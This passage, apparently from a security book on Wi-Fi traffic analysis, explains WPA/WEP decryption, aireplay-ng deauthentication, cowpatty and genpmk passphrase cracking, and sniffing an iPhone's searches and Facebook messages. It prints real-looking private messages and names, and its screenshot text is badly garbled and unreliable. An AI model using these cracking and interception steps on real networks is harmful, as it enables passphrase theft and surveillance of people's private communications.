so the user can view the decrypted traffic. 


When working with traffic that is encrypted with WPA/WPA2 there are some other impor- 
tant considerations of which to be aware. The primary thing to keep in mind is that traffic for each 
device is encrypted separately from the point at which that device authenticates to the network. 
This is important because it means that the actual authentication (called the handshake) needs to 
be captured as well so the traffic after that point can be successfully decrypted. This is much dif 
ferent than WEP traffic since WEP traffic can be decrypted from the point in which the network 
capture is initiated, whereas WPA/WPA2 traffic can only be decrypted from the point at which 
the device successfully authenticates to the network. 

The next screenshot illustrates an example of WPA-encrypted traffic being decrypted with 
Wireshark. Notice that the first frame being displayed is frame number 1261. This means that other 
traffic has been captured but the only frames that have been decrypted are from the point where the 
authentication (Extensible Authentication Protocol [EAPOL] frames) has been captured. The “eapol 
|| ip” display filter has been applied to show the authentication frames and the frames that contain an 
IP address. IP addresses will not be shown unless the frame has been successfully decrypted. 
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Sparta-WPA-01.cap - Wireshark IE 
File Edit View Go Capture Analyze Statistics Help 
Ea E la b a oo T R = Q = E 
& a m e ü LAXA e F SBS &««eED 
Eter: feapot II ip v | 4 Expression...| & clear | ? apply 
Source Destination Protocol | info n1 
1261 17.834130 :22: ji 00; 23; 6c : 32; 32:42. 
1263 17.838228 00:22:6b:8c:a8:b3 EAPOL Key 
1265 17.842834 00: 23: 6c : 32:32:42 EAPOL Key 
1269 17.866899 0.0.0.0 255.255. 255.255 DHCP DHCP Request - Transaction ID 0xf5379210 
1272 17.871503 192.168.50.1 192.168. 50.137 DHCP DHCP ACK - Transaction ID 0xf5379210 
1351 18.833619 192.168, 50,137 192.168.50.1 MONS Standard query[Malformed Packet] 
1353 18.834643 192.168,50,137 192.168.50.1 SSDP M-SEARCH * HTTP/1.1 
1359 18.841811 — 192.168,50.137 192.168.50.1 DNS Standard query A safebrowsing.clients.googl 
1360 18.842319  192.168.50.1 192.168.50.137 SSDP HTTP/1.1 200 OK 
1365 18.863315 192.168.50,137 192.168.50.1 TCP 49331 > park-agent [ACK] Seq-l Ack=1 Wine3i |v| 
ni 
Tee 
> Frame 1261 (153 bytes on vire, 153 bytes captured) E 
> IEEE 802.11 Data, Flags: ...... F. 
P Logical-Link Control 
7 802.1X Authentication 
Version: 2 
Type: Key (3) 
P enath: 117 4 
O0 08 02 3a Ol 00 23 6c 32 32 42 00 22 Gb 8c a8 b3 m ."k E 
110 00 22 6b 8c a8 b3 40 79 aa aa 03 GO 00 00 88 Be "key. 
120 02 03 00 75 02 00 8a OO 10 00 00 00 00 00 00 00 soslesao oon Isl 
130 Oc c9 66 Sb 4e 02 9c a8 02 34 76 f7 3b 13 fe bd mi TEM M 
MO ed f! 13 af ed af fl ha dA ea cd d? 17 df Sa 02 2 7 » is 
File: "/root/Sparta-WPA-01,cap" 4861 KB 00:18:23 iPackets: 161652 Displayed: 166 Mar... :[Profile: Default 


Since WPA/WPA2 can only be decrypted from the point when the device authenticates to the 
network, it could be useful to know that it is possible to force a device to reauthenticate. This can 
be done by using a utility in BackTrack called aireplay-ng with the “-0” (dash zero) option to force 
the device to deauthenticate from the network therefore causing the device to need to reauthenti- 
cate. The next screenshot shows an example of a successful deauthentication. 

Here are some of the available switches for aireplay-ng 


-0 = deauth mode 

1 = send one deauth frame 

-a = the MAC address of the access point 
-c = client MAC address 


wlan0 = network device to use to transmit frame 


root@bt: ~ - Shell No. 3 - Konsole 
Session Edit View Bookmarks Settings Help 


/*J| SÆ Shell | ge Shell No.2 | Shell No. 3 


Wireshark can decrypt WEP, WPA, and even WPA2 traffic. Another utility that can be used for 
either WEP or WPA/WPA2 decryption is airdecap-ng. This utility takes the user input, applies 
it to the frames in a capture file, and creates a new output file that only contains the success- 
fully decrypted frames. In this instance, the new capture file can be opened and analyzed with 
Wireshark without the need to input any keys into the Wireshark preferences. 

The next screenshot shows an example of using airdecap-ng to decrypt the WEP traffic in the 
WEP-Sparta.cap network capture file. Notice it displays information about how many packets 
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were able to be decrypted with the given information. Also notice that a new file, WEP-Sparta- 
dec.pcap, has been created that only contains the traffic that has been successfully decrypted. This 
could make the analysis much more efficient because we are now only dealing with the packets 
that we are interested in and not all the other network noise. 

Here are some of the options that can be utilized for airdecap-ng 


B -|= don't remove 802.11 header 
B -b= MAC address of access point 
B -w= WEP key 


root@bt: ~/Captures - Shell No. 2 - Konsole 


Session Edit View Bookmarks Settings Help 


iE Shell | at Shell No.2 | gg Shell No. 3 


It's also important to keep in mind that when capturing Wi-Fi traffic there are several uncontrol- 
lable factors, such as interference from microwaves, wireless phones, baby monitors, and so on that 
could have a negative effect on the success of capturing the data. It's not unusual to capture wire- 
less traffic that is not 10096 complete. As shown in the next screenshot, Wireshark will point out 
where and how much data is missing. These small missing pieces in the capture may not always 
hinder the analysis but it can be a much larger issue when it comes to actually extracting data 
files from the capture. For example, if 10096 of an image is captured then it can be extracted and 
the hash of the extracted file will match the file downloaded to the receiving device. If a single 
byte isn't successfully captured then the hashes will not match. In the case of the image file, the 
image may be able to be opened and viewed but there may be some sort of artifacts that aren't in 
the original file. This could be a line through the image, parts or pieces missing, and so on. It is 
scientifically impossible to guarantee that every single byte of the Wi-Fi network traffic is success- 
fully captured. Knowing and understanding this could prove to be vital in some circumstances. If 
someone wanted to argue the point that there was something wrong with the capture procedure 
since there are bytes missing, then this could be correctly explained. 


Follow TCP Stream =x 


Stream Content 


[245 bytes missing in capture file] V 


SE rti neat T Erase 
n..4';..n.. [148 bytes missing in capture filel].......c..... VOL. ..*^ V.S. - eh. ii Hou TAL use BR eim Oe 
a fee. (ant TEL IEEE, TTJYLERERL IE IS. ESSENT T €... QM AL ses, n.0}. 0... () a7 TR, HL tUB, , 
dva ant te RO ere Mur emer nva a NN 
MC LIjaX W... des sspe so $i. P.LQ.n. |, [37 bytes missing in capture file]}...,.9KM..K..y.,.}D..9.H..°H 
a Bnd save as| Serin] Entire conversation (540 bytes) E lo ASCII O EBCDIC O Hex Dump O C Arrays © Raw 


Hub riter out This stream 
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We have discussed several different things to be aware of when capturing Wi-Fi traffic for vari- 
ous security settings. One thing to notice is that if we know what the key or passphrase is then we 
are able to decrypt the traffic for analysis. Next we will take a look at some of the information that 
can be extracted from that decrypted network traffic. 


Physical Wi-Fi Device Identification 


One of the most important aspects of targeting a device is the ability to identify the type of device it 
actually is. Different devices work on the network in different ways with different capabilities. Whether 
you're an expert on a particular device or not, the network traffic will help determine what type of 
device it is. Analyzing the network traffic allows us to view two important pieces of device identifying 
information: the device name and device MAC address. Luckily, it's very easy to find this information. 

In this example, we are going to be targeting an iPhone connected to a wireless access point. 
To be able to discover what the name of the device on the network is we can take a look at the 
multicast domain name system (MDNS) traffic. MDNS is a technology developed by Apple and is 
used by the iPhone to help make networking devices together easier for the user. It is very similar 
to the standard DNS protocol, where its purpose is to resolve a computer or device name to an IP 
address, but acts in a slightly different way. This technology works by each device keeping its own 
records of devices on the network instead of relying on a dedicated device to answer client DNS 
requests. For this to be able to work one of the first things the device must do is to poll the network 
for a list of devices on the network that support MDNS. 

In the next screenshot we can see an example of the MDNS frame. A query is sent to the 
multicast IP address 224.0.0.251 on port 5353 seeking records from other MDNS capable devices 
to build the local list. This frame will also contain the actual device name as shown in the Info 
column: RealiTeeCHK.local. 


WEP-Sparta-dec.pcap - Wireshark 


File Edit view Go Capture Analyze Statistics Help 
TAAA SEXTA erT 
(ster. v| 4 Expression... È clear| S Apply 

ECC CERE [77777 RN 777177 j 


192.168.50.137 192.168,50.1 ONS Standard que 
z - Standard query ANY 


tandard query re E 


PIR, cache 
Who has 169.254.255.255? Tell 192.168.50. 


andard query 


~ Queries 

YV RealiTeeCHK,local: type ANY, class IN, "QU" question 
Type: ANY (Request for all records) 
.000 0000 0000 0001 = Class: IN (0x0001) 
le os sere sere = "QU" question: True 
v Authoritative nameservers 


V RealiTeeCHK,local: type A, class IN, addr 192.168,50.137 


Type: A (Host address) 
.000 0000 0000 0001 = Class: IN (0x0001) 
0... cass sess seee = Cache flush: False 
Time to live: 2 minutes 


[E S o 


Text item (), 23 bytes iPackets: 1592 Displayed: 1592 Marked: O :| Profile: Default 
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This device name, for this particular device, is the name of the iPhone. The iPhone name 
can be configured simply by using iTunes. In the next screenshot we can see the name of the 
device shown in the Summary tab and under Devices in the Navigation pane. By clicking on 
the device name it will allow the user to rename the iPhone from the default name. Anything 
other than the default name makes it that much easier to identify a single device from any 
other device. 


File Edt View Controls Store Advanced Help iTunes Bow 
r] 
A mee Summary Applications Ringtones Music Movies TY Shows Podcasts 
El Movies i 
TV Shows iPhone 
Pae D 
& Ringtones Capacity: 7.08 GB 
"KC Rado Software Version: 3.1.3 
Gm Serial Number: 0707] 
E iTunes Store Phone Number: [ — 23) 
Y DEVICES 
Y SHARED Version 
f reno sterio Your Phone software is up to date, iTunes will automatically check for an 
Y GENIUS update again on 2/15/2010. Check for Update. 
HÈ Genius a IAM C A E DIETUCUET E 
If you are experiencing problems with your iPhone, you can restore its original — 
YPLAYLISTS settings by clicking Restore, (Restore | 
t$ iTunes DJ 
ls rev tet 


'Ihe next, and probably most important, piece of identifying information is the device MAC 
address. The MAC address is a hard-coded address that is applied to the network card during 
manufacturing. Any device that communicates on the network will need to have a unique address 
on that network and it will be included in every frame that is sent over the network. If we take 
another look at the screenshot of the MDNS frame, we can see an ARP request broadcast and in 
the Source column the MAC address is displayed. The MAC address can be found in the Wi-Fi 
address field in the iPhone by navigating to Settings > General > About. This information can be 
compared to the information in the capture file to positively identify the device that conducted 
the network communication. 

There is one major thing to keep in mind when relying on the MAC address. It is possible to 
change or spoof the MAC address. If the MAC address is being changed on a regular basis then it 
could add a level of difficulty to capturing its data, but will not make it impossible. 


WPA Rainbow Tables 


Cowpatty can be used in conjunction with a dictionary and capture file that contains the hand- 
shake, but the problem is that it could possibly take a very long time to process and test the entire 
dictionary file. Thanks to RenderMan, and the help of some other very smart and motivated 
people, there is another way to blow through the dictionary list. Even if the passphrase isn’t in 
the list, you can get to that result much faster. More technical details about what processes are 
taking place with WPA-PSK rainbow tables can be found at www.renderlab.net. We are going to 
concentrate more on how to use the rainbow table utilities. 

‘The important thing to remember about the WPA-PSK rainbow tables is that the tables need 
to be created for each and every SSID that it will be run against. Therefore, if a person is going to 
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audit an access point with the SSID of “crackme,” then a rainbow table would need to be generated 
specifically for that SSID. This can be done with the genpmk utility located at /pentest/wireless/ 
cowpatty on the BackTrack Linux distribution. This example will use the small dictionary file 
already located in the distribution called dict. To run genpmk to create the rainbow table for the 
SSID linksys, type 


genpmk -f dict -s linksys -d rt-linksys 


This command will create the rainbow table called rt-linksys using the dict dictionary file for 
the SSID of linksys. 

Keep in mind that the hacker will need to capture wireless traffic that contains the authentica- 
tion process. The deauth technique can be used force the system to reauthenticate while running 
airodump-ng to capture the authentication frames. Once the handshake process is captured to 
a pcap format, and the rainbow table has been generated, the hacker can then launch the attack 
against that capture file to attempt to recover the passphrase. This is done using the cowpatty util- 
ity. To launch the attack, type 


cowpatty -d rt-linksys -s linksys -r wpapsk-linksys.dump 


If the passphrase was contained in the dictionary used to create the rainbow table file, then it 
will display the correct passphrase to the hacker. 


root@bt: /pentest/wireless/cowpatty - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


root@bt: /pent« rele wpatty# cowpatty -d rt-linksys -s linksys -r wpapsk-|#) 
linksys.dump 
cowpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg.com> 


Collected all necessary data to mount crack against WPA/PSK passphrase. 
Starting dictionary attack. Please be patient. 


The PSK is "dictionary". 


3740 passphrases tested in 0.11 seconds: 34782.61 passphrases/second 
root@bt: /pentest/wireless/cowpatty# 


[*]| am Shell 


To get an idea of the speed improvements that using rainbow tables provides, using cowpatty 
with the dictionary processed about 229.80 passphrases per second; using the rainbow tables 
processes approximately 34,782.61 passphrases per second. Also, after the rainbow table has been 
created the first time for a particular SSID, it can be reused against other access points that use 
that same SSID. To potentially save a massive amount of CPU cycles, many precomputed WPA- 
PSK rainbow tables for the most common SSIDs have already been created and can be freely 
downloaded by anyone from www.offensive-security.com/wpa-tables. 

In a final thought, if you already know what the passphrase is and you have downloaded the 
49 million WPA-optimized word dictionary file from offensive-security.com, then you are not 
required to go through all the steps of capturing the handshake, generating the rainbow table, and 
so on. To see if your passphrase is contained in the dictionary file, in BackTrack type: 


cat «wordlist dictionary file> | grep «your passphrase> 
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This will look for your passphrase inside the dictionary file. If it’s found, then you know that 
someone would be able to quickly retrieve your password using this source. 


Analyzing Wi-Fi Network Traffic 


In this chapter we've discussed some of the tools and methodologies for working with Wi-Fi 
technology. In this section we are going to use the methods previously discussed to analyze the 
data transmissions from a popular device, the iPhone. The iPhone, as with many other available 
devices, has built-in Wi-Fi capabilities. The first question that may come up may be, why are we 
using the iPhone in our examples? Well, simply because it’s currently a popular device, and prob- 
ably most importantly because many people may not realize the security implications that can be 
associated with using this type of device. Most people may only be concerned about whether or 
not a device is functioning properly and aren’t fully aware of what type of information is actually 
being transmitted when in use. Therefore, we are going to discuss some of the different types of 
information that are exposed when analyzing the network traffic of the iPhone. Of course these 
same techniques can be used for any other type of device also. 


Network Analysis 


The next thing we are going to do is actually examine a network capture file that’s already been 
captured using the previous techniques. This capture file contains some different types of traffic 
generated by using the iPhone over the Wi-Fi connection. We want to see what types of informa- 
tion may be included in the capture file that is transmitted in the clear so we can see the content. 
When examining the capture file its important to keep in mind that it’s possible that a lot of the 
data may be transmitted encrypted. As time moves forward it seems like more and more applica- 
tions are beginning to encrypt the transmissions. In these instances we may not be able to view 
the content but sometimes it could be just as interesting to know that the connections physically 
took place. 

‘The first thing to keep in mind is that there is no single one way set in stone to conduct the 
analysis of network traffic. There are many technologies and applications that transmit data in 
different ways. Depending on the type of data contained in the capture file you may need to 
research how that protocol, application, or website processes information. For example, web traffic 
is transmitted over HTTP and websites are built using many hyperlinks and scripts that may link 
to other websites. Therefore, just because a particular domain name or IP address is found in the 
capture file we can’t make the assumption that it was an action specifically and purposely executed 
by the user. 

There are a couple of things I like to do first when starting to examine a capture file. The first 
thing to do after opening the capture file is to take a look at the protocol hierarchy statistics found 
under Statistics > Protocol Hierarchy in Wireshark. What this can do is give a decent idea of the 
different types of information contained in the file. As we can see from the next screenshot, there is 
a decent amount of HTTP traffic. Under the Hypertext Transfer Protocol section we can see some 
different types of HTTP traffic and any section can be used to create a display filter to include or 
exclude that data type in the main Wireshark view by right clicking the field and choosing the 
desired option. For example, the “line-based text data" converts to the display filter “data-text- 
lines" that reassembles multiple segments into a single view that can be analyzed easier. 
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Wireshark: Protocol Hierarchy Statistics 


Display filter: none 


Protocol % Packets [Packets [Bytes — [Mbit/s [ena Packets [End Bytes [End mbit/s | 
'" Frame 100.0096 18205 14291144 0.052 o o 0.000 
7" IEEE 802.11 wireless LAN 100.0096 18205 14291144 0.052 o o 0.000 
"" Logical-Link Control 100.0096 18205 14291144 0.052 o o 0.000 

7 Internet Protocol 99.2896 18074 14282186 0.052 o o 0.000 

" Transmission Control Protocol 98.29% 17893 14258013 0.052 11804 5461230 0.020 
Hypertext Transfer Protocol 31.84% 5796 8409000 0.030 5754 8371607 0.030 

Line-based text data 0.0696 il 8006 0,000 11 8006 0.000 

Portable Network Graphics 0.0296 3 1407 0.000 3 1407 0.000 

MIME Multipart Media Encapsulation 0.0896 14 11514 0.000 14 11514 0.000 

JPEG File Interchange Format 0.0596 10 10641 0.000 10 10641 0,000 

Compuserve GIF 0.01% 1 1455 0,000 1i 1455 0.000 

extensible Markup Language 0.0196 1 1306 0,000 1 1306 0.000 

Malformed Packet 0.0196 2 3064 0.000 2 3064 0.000 

Secure Socket Layer 1.6196 293 387783 0.001 293 387783 0.001 

> User Datagram Protocol 0.9696 175 23765 0,000 o o 0.000 

Domain Name Service 0.69% 126 14507 0.000 126 14507 0.000 

b NetBIOS Datagram Service 0.04% 7 1638 0.000 o o 0.000 

NetBIOS Name Service 0.1696 30 3300 0.000 30 3300 0.000 al 


$J Help 


As we can see from the next screenshot, when we apply the “data-text-lines” display filter there 
is a different type of data uncovered. Now we are able to view streams that have been identified 
by Wireshark as being type text/html and text/plain. When frame number 3534 is selected, then 
the details of that segment are displayed in the middle pane and we can see which frames make 
up that segment: frame 3533 and frame 3534 in this example. Next, we highlight the last line in 
the middle pane, which will cause some other tabs in the bottom pane to be displayed. By select- 
ing the Uncompressed entity body tab, at the bottom, we can begin to see the data in a human 
readable format. In this example we can see that we are viewing some results from the Facebook 
inbox. We can see there are six new unread messages, the subject line, and the beginning of each 
message. Then of course we can continue on through this view in the capture to see what other 
information can be discovered. 


5 iphone-wep-01-dec.cap - Wireshark - ACE: 
File Edit View Go Capture Analyze Statistics Help 


SHAMCM SEXSarcesvtsZ & «e Fia x 
[V] Eiter: data-text-lines ~| +} Expression... & Clear off Apply 
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3534 22:38:36.555551 m.facebook.com 


Ini 


HTTP/1.1 200 OK (text/html) 


3566 22:39:43.106027 69 .135 0 text/plai 

3583 22:30:53, 343582 n. facebook. com sna Toc HTTP MTP 200 OK (text/html) |l 
3609 22:40:40.691229 69.63.178.135 iPhone.local HTTP HITP/1.1 200 OK (text/plain) 

3670 22:43:00.538141 69.63.178,50 iPhone. local HTP HITP/1.1 200 OK (text/html) B] 


“><mailbox fo 0" total="17"><thread tid="1125616439797" time="1; 


<?xml ve rsioi 
.0" enco di 


Frame (1023 = Reassembled TCP (2387 bytes) Uncompressed entity body (4615 bytes) 
Text item (), 4576 bytes :] Packets: 18205 Displayed: 11 Marked: 0 Profile: Default 
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The next thing I like to look at is the DNS request information. This can provide a decent 
insight to what the device has at least attempted to connect to and what some of the installed apps 
may be. Since a device needs to lookup the IP address of a domain name so it can connect to it, 
a DNS query is sent out to the DNS server requesting that information. This allows us to use the 
display filter “dns.flags.response == 0” to only show us those DNS queries. By taking a quick look 
at the next screenshot we can see that queries were made for hackersforcharity.org, wordpress.org, 
google.com, backtrack-linux.org, facebook.com, and so on. If we wanted to see all DNS queries 
and responses then we could just simply use the “dns” display filter instead. 


[V] iter: |dns flags. response == 0 


:27:50.618029 iPhone.local Standard query A a199.gi3.akamai.net 
:28:08.417833 iPhone.local 192.168.50.1 Ds Standard query A www. apple.com.akadns.net 
b2: 28:09, 495144 iPhone. local 50.1 Standard query A a199,gi3.akamai.net 
b2:28:44.533021 iPhone.local 68.50.1 Standard query A www.gstatic.com mn 
29:02.652330 iPhone.local 192.168.50.1 DNS Standard query A www. hackersforcharity.org 
:03.836639 iPhone. local 192.168.50.1 DNS Standard query A lite.piclens.com 
:04.933923 iPhone. local 192.168.50.1 DNS Standard query A counters.gigya.com 
:47.976930 iPhone.local 192.168.50.1 DNS Standard query A wordpress.org 
:50.099362 iPhone.local 192.168.50.1 DNS Standard query A edge.quantserve.com 
:54.267294 iPhone.local 192.168.50.1 DNS Standard query A pixel.quantserve.com 
38.466980 iPhone.local 192.168.50.1 DNS Standard query A ww. l.google.com 
54.886821 iPhone. local 192.168.50.1 DNS Standard query A www. backtrack- linux. org 
58.200739 iPhone. local 192.168.50.1 DNS Standard query A ajax.googleapis.com 
01.806440 iPhone.local 192.168.50.1 DNS Standard query A www.adobe.com 
03.355880 iPhone.local 192.168.50.1 DNS Standard query A ww-google-analytics.l.google.com 
02.373273 iPhone.local 192.168.50.1 DNS Standard query A O.channel65. facebook.com 
06.929832 iPhone.local 192.168.50.1 DNS Standard query A a1814.g.akanmai.net 
130.868388 iPhone. local 192.168.50.1 DNS Standard query A api.facebook.com 
bo. QA. AW ARAIA iDhana Taral 102 1AA SAT nuc Ctandard anerw A va) farahaal cam EH 


Now if we go back and take a look at the screenshot of WireShark protocol hierarchy statistics, 
we can see there was some extensible markup language (XML) discovered. If we take a look at that 
information by applying the "xml" display filter in Wireshark, then we can see what information 
we may be able to find. The next screenshot shows an example using this display filter and what 
type of information we can get. From this point there is another great feature built into Wireshark 
to mention called Export Selected Bytes. From this view we can highlight the XML section, right 
click, and then select Export Selected Bytes. In this example it was saved to a file called "facebook 
.xml." From this view we can see that we have information containing the user ID, name, last 
name, and link to the profile image of the Facebook users. 


[V] Eiter: [xml root - Konqueror 
Location Edit View Go Bookmarks Tools Settings Window Help 


ime Source Destination 


12:45:58, 755741 66.220.146.22 iPhone. local OCOL OX =a goaa 
E 1| ED Location: |  /root/facebook.xml 
lz---— 0c NEN cs NN 
V anat http://profile.ak.fbcdn.net/v22943/1557/92/31063435432 ipg 
> <fql_query_response 54 S u s i 
mainos http: //eqi facebook. con/1.8/7 __ [http/profile.ak.fbcdn.net/hprofile-ak-sf2p/hs254.5nc3/23135 544 
xalns:xsi="http: //www.w3.org/2001/XMLSchema-instance ES | Paul 
- EUM * neo: //profile.ak.fbcdn.net/v230/1625/16/q1418088401 9 .Jpg 
P <uid> Melissa 
diane: bs /[profile.ak.fbcdn.net/v226/1139/32/31551754665 ipo 
 — n] 12 Cherie 
«/nane» http://profile.ak.fbcdn.net/hprofile-ak-sf2p/hs257.snc3/23201 117 
P last nane» DoAENN Joyce ay 
> epic square» http:;//profile.ak.fbcdn.net/v222/1742/100/31263815685 i joo 
</user> 12059 Julie 
v «user» http://profile.ak.fbcdn.net/hprofile-ak-sf2p/hs275.snc3/23250 120| 
b aide "EFL — Danie 
7 <nane> nttp://profile.ak.fbcdn.net/v226/202/105/q1324242735 po 
sic OLLLLLLLLLAI 1012 Terr 
</nane> http://profile.ak.fbcdn.net/v22939/67/35/q1012096038 il po 


b «last name» 12 Joanne 


=a 
E pic square. http://profile.ak.fbcdn.net/v227/1440/84/3122127329! Jpg 
| user 17728 Terri 


p: X GU WSS ueram t//proflle.ak.fbcdn.net/v22944/1727/74/31373452781009 jo 


010 2e 30 22 20 65 Ge 63 6f 64 69 Ge 67 3d 22 55 54  .0" e| 
2n AR 2d 38 22 3f 3e fa 3c AAT Ae Sf 71 75 65 72 — E-R'?| 


Frame (1306 bytes) Uncompressed entity body (2538 bytes) Jj («I») 


: Page | f 
fie: [root/iphone-wep-01-dec.cap" 13 MB 00:36:54 J Packo es LT 
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Follow TCP Stream is another very useful feature in Wireshark that can be used to quickly 
and easily view data spread over multiple streams. To use this feature, highlight a frame in the 
upper pane, right click, and then select Follow TCP Stream. The output will be similar to that of 
the next screenshot. In this example we are now able to identify the iPhone application and version 
that is being used to communicate with iphone.facebook.com. 


Follow TCP Stream 


Stream Content 


POST /touch/thread.php HTTP/1.1 
ost: iphone.facebook.com 


Accept-Language: en-us 
Accept-Encoding: gzip, deflate 
ontent-Length: 614 

connection: keep-alive 


- -3i2ndDfv2rTHiSisAbouNdArYfORhtTPEef j3q2f 


Now if we scroll down, as shown in the next screenshot, we can see what other information 
is contained in the TCP stream. We can quickly see that this contains a thread response for 
facebook.com. We are also able to see the date and time of the message, the ID and name of the 
message author, the link to their profile image, and the actual message that was sent. 


Follow TCP Stream 


Stream Content — —— — — — ———— — = = — 


|c241820a47e20721dde98065-1499854522 

|- -3i2ndDfv2rTHiSisAbouNdArYfORhtTPEef j3q2f - - 

HTTP/1.1 200 OK 

Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 

Expires: Sat, Ol Jan 2000 00:00:00 GMT 

P3P: CP="DSP LAW* 

Pragma: no-cache 

Set-Cookie: datr=1265773199-2da562b93b6a45dd767497611228e2906534e0b27e0cS40e36f30; expires=Fri, 10-Feb-2012 03:39:59 GMT; path=/; 
ontent-lyper tex 
X-Cnection: close 


al; charseteutf-8 


<?xml version="1.0" encoding="UTF-8" ?> 
thread response»«thread tid="1163186293130" count="1"><message mid="0" time="1253568903" eae body="Hey! Thanks 
girl! I'm taking it one day at a time. I have my good days and bad days! I don't understand why this d but I have to accept 
lt. Jayden will get loaner hearing aids next week and more testing to see if they improve his hearing. If it gets any worse he will 
heed a Cochlear implant. We r doing all the diagnostic testing soon to try to find a cause. Thanks for keeping us in your prayers. 
Hope everything is going good with you! " unread="false"/></thread><user o — mmi 
pic_square="http: //profile.ak.fbcdn.net/v22943/1557/92/ 0S jpg" af="1" cs="1"/></thread_response> 


A End Ej] save As Print} Entire conversation (2150 bytes) * [O ASCII O EBCDIC O Hex Dump O C Arrays © Raw 
H Help [V] Fiter out This Stream 


Another use for “Follow TCP Stream” is to reconstruct web pages that have been viewed in the 
Safari browser installed on the iPhone. The next screenshot illustrates an example of what a web 
page may look like. This allows the hacker to even view the web page source code and it may be 
possible to export this data to see a close resemblance of what the actual user viewed. The success 
of this depends on the way the website is designed. Therefore, if the website is database driven it 
may not be able to poll the database for the information and some pieces may be missing. In this 
example we are able to read the text content of the website to get a decent idea of what the web 
page is about. 
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Weiter: [Gp.addr eq 192.168.50.115 and ip.addr eq 174. | 4 Expression...| & 


Follow TCP Stream 


Stream Content 


[E] 
- End left-col --» LI 
--<ul ide"right-col*» 
<li ide"donations-cloud-cloud* class="widget dc cloud widget"»Donor Cloud«div ide'dc linkcloud'»«a style='color: #807044; font- 
[size:13.55px;' title-'10.00 USD, 2010/01/12' href-'https://www.hackersforcharity.org'» 3plc ChaQs</a> «a style='color: #807044; font- 
jsize;105.55px;' title-'2000.00 USD, 2010/01/11' href='http: //www. foregroundsecurity.com'’> Foreground</a> <a style='color: #807044; 
|font-size:13.SSpx;' title='10.00 USD, 2010/01/14' hrefe'http://www.pauldotcom.com'» [1448 bytes missing in capture file] right of the 
klecimal. 
lif 3t DollarAmount < 10) ( alert("Please enter an amount more than $10."); return false; } 
Sif (dc-oet('pp vabsite).value == ** [I dc. qet('pp-vebsite!).valus e "htpi//*) 4 atert("Plessa entar your vebsite's UL"); return 
H 
1f (dc get("pp. Linktext*).value «s **) ('alert(*Plense enter a link texts"): return false: } 
return true; 
5293 
|. /* 1)» */«/script» 
kp ide"dc credits*» 
,.Donate, get linked, feed a child!-br»All proceeds go directly to our «a style='text-decoration: underline' hrefe'http:// 
hackersforcharity.org/hackers-for-charity/about-us/sfood program'»Kenya food for work program«/a».«/p» 
..«form actione'https://www.paypal.com/cgi-bin/webscr' methode'post' ide'dc paypal form' onsubmite'if (idc checkform()) return false;'» 
[E] 
D| 
©\ Eind| [Z] Save As | Gi Print| Entire conversation (82791 bytes) $ |O Ascii O EBCDIC O Hex Dump O C Arrays © Raw 


Hus [iter out This stream 


One of the most used features of the Internet is utilizing search engines like Google to find 
information. It could be useful to find out what type of content the target is searching for on the 
Internet. Since there is a specific structure that Google uses to build the search string we can use 
that information and build a display filter to show us that information. One of the most useful dis- 
play filters in Wireshark is the “frame contains” display filter. By creating the display filter [frame 
contains “/search?q=”] we are able to quickly get a list of search strings that was manually searched 
for by the iPhone user. In the next screenshot we can see that the user used Google to search for 
“hackers for charity” and “backtrack linux” on iPhone.local at IP address 192.168.50.115 and 
the exact time the searches were conducted. We can imagine from this example how potentially 


valuable this type of information could be when gathering information about the targeted or 
untargeted user. 


[V] Eiter: frame contains "/search?7q=" 


m ETC e 


12:28:41.573987 iPhone. local 64.233.169. 104 


GET /search?q=l TEE E yt ie-UTF- 8&oe-UTF - B&h| 


2: 28: 44.510492 iPhone.local 64.233.169.104 Hn GET 7xhtaU/ yor a 
2:28: 44.616478 iPhone. local 64. 233.169, 104 HTTP GET /images/tb_ pue gif HITP/1.1 
P2:28:44.647200 iPhone.local 74.125.115.99 HTTP GET /m/images/cirrusl. gif HITP/1.1 
b2; 29:02.746025 iPhone. local hackersforcharity.org HTTP GET / HTTP/1.1 
b2: 30:38. 526883 iPhone. local 64,233, 169.104 HTP GET [sreirosbecktracrsTinmieeIm- senes Bahn | 
)2:30:55.023591 iPhone, local www. backtrack-linux.org HTTP GET / HITP/1.1 
ii —Ó————É———————À— LS D] 


b Frame 133 (857 bytes on wire, 857 bytes captured) 
> IEEE 802.11 Data, Flags: ....... T 
P Logical-Link Control 
> Internet Protocol, | Src: iPhone.local (192.168.50.115)] Dst: 64.233.169.104 (64.233.169.104) 
b Transmission Control Protocol, Src Port: 49782 (49782), Dst Port: http (80), Seq: 1, Ack: 1, Len: 773 
|V Hypertext Transfer Protocol 
M cer ie-UTF-8&oe «UTF-B&hl«en&clientesafari HITP/1.1\r\n 
Req Method: GET 
ie=UTF-8&0e=UTF-8&hl=en&client=safari 
Request Version: APA. 1 
User-Agent: Mozilla/S.@ (iPhone; U; CPU iPhone OS 3 1l 2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Versior 
Accept: application/xml, application/xhtml+xml, text/html; q=0.9, text/plain; q=0.8, image/png, */*;q=0.5\r\n 


Arrant Lanaianns an nel eh 


[ET EE D] 


The iPhone also includes the YouTube application installed by default. This allows users to be 
able to watch YouTube videos directly from the iPhone using either the 3G or Wi-Fi connections. So 
the question would be, is it possible to find out what videos the user is watching? The answer is yes. 
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In the next screenshot we can see the time that the user requested the .mp4 video from vl.cache7 
.googlevideo.com. Something to notice in this image is its "partial content” and the “content range.” 
This tells us that the video will be transferred in sections instead of one constant transmission. This is 
important because we wouldnt be able to extract and re-create the video locally very easy. We would 
need to extract the hex data for each and every segment and use a hex editor to reconstruct the data 
in the correct order by using the information in the "content range" field. And, since this is a wireless 
network there is a high potential that 10096 of the transfer will not be captured. 

Even though it may be very difficult to carve the video file out of the network capture, we can 
still use the information contained in the stream to download the same video file viewed by the 
user. To accomplish this just copy the Host section “vl.cache7.googlevideo.com” and paste it into 
the web browser. Next copy the get request from the “/” all the way up to, but not including, the 
HTTP/1.1. Now append that string to the string in the web browser and click Enter. Basically all 
we are doing is taking the information in the stream and creating a direct link to the same video 
the iPhone user viewed that can be downloaded and saved locally. 


Follow TCP Stream LES 


Stream Content 
ET /videop layback ?id=5961a0bf1Sa40ca96i tag=186ip=0, 0.0. O&i pbi ts-O&expi rez1268366195&sparanszi dss2Ci tag2Ci p&aCi pbi tss 


CIE robai ACUTE USER TEASE iat 23  OAMADIEEBND; Kail ec STI BM ytaléel =videos&client=ytapi- 
